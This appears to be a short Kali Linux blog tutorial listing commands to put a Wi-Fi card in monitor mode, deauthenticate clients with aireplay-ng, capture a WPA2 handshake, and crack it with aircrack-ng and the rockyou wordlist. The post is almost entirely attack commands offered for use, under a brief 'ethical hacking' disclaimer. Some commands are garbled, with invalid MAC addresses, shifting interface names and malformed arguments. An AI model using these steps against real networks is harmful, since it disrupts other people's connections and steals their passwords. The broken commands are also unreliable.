Cracking WiFi WPA2 Handshake ListOfCommands | Kali Linux

23:06
Wi-Fi deauthentication attack List of commands for Kali Linux and other hacking OS.

The device needs to have inbuilt or external Wi-Fi Powered with monitor mode, airodump-ng and aireplay-n installed in it. The blog is only for educational purposes. Please use it to protect your network form being attacked by hackers. We are the ethical hackers and this is another post on ethical hacking (Wifi deauthentication and wifi handshake capture on Kali Linux)

To switch between monitor mode and managed mode use the List Of Commands mentioned below.I've used a dummy MAC address to represent the WiFi MAC and Client MAC.
Please change them before you run the List of commands. You can perform Wi-Fi deauthentication attack using any Laptop has inbuilt WiFi in it (supports monitor mode). To perform a Wi-Fi deauthentication attack you do not have to connect with any wifi network. Follow the List of commands mentioned below:
Check wifi interface address
 $ ifconfig (assuming your interface name is wlp2s0) 
Check if monitor mode is supported by WiFi interface
 $ airmon-ng start wlp2s0
Turn off wifi
 $ ifconfig wlp2s0 down 
Start monitor mode
 $ iwconfig wlp2s0 mode monitor 
Check wifi mode status
 $ iwconfig 
Turn on wifi
 $ ifconfig wlp2s0 up 
Check for wifi access points visible near you
 $ airodump-ng wlp2s0 
Check active clients connected to BSSID (wifi access point)
 $ airodump-ng wlp2s0 --bssid 00:00:00:00:00:00 --channel 4 --write details.txt 
MAC ADDRESS OF WIFI -c CLIENT CONNECTED TO IT (deauth)
 $ aireplay-ng --deauth 100 -a 00:00:00:00:00:0 -c 00:00:00:00:00:00 wlp2s0 
Turn off wifi
 $ ifconfig wlp2s0 down 

We have successfully disconnected the user form the wifi. If you try connect the user back to his wifi he will not be able to connect till you stop the deauth attack using ctrl + c.
Lets capture the wifi handshake and Decrypt it to get the AP password
I assume that you already have turned the moitor mode to view the list of access points on your terminal
#List all the active wireless point
 $ airodump-ng wlp0s20f3
#Device I want to capture is running on the channel 5
airodump-ng wlan0 --channel 5 -w cap2
#Deauth to disconnect the client so that we can capture the wifi handshake.
 $ aireplay-ng -0 5 -a E8:S4:00:00:00:00 wlan0
To view the captured file run the command
 $ ls -l cap*.cap 
#Lets decrypt it
 sudo apt install wordlist
Run the command to view the password from wordlist
 $ aircrack-ng -a2 -b NETWORK E8:S4:00:00:00:00 -w /usr/share/wordlists/rockyou.txt 
Happy ethical hacking...
Take care of yours.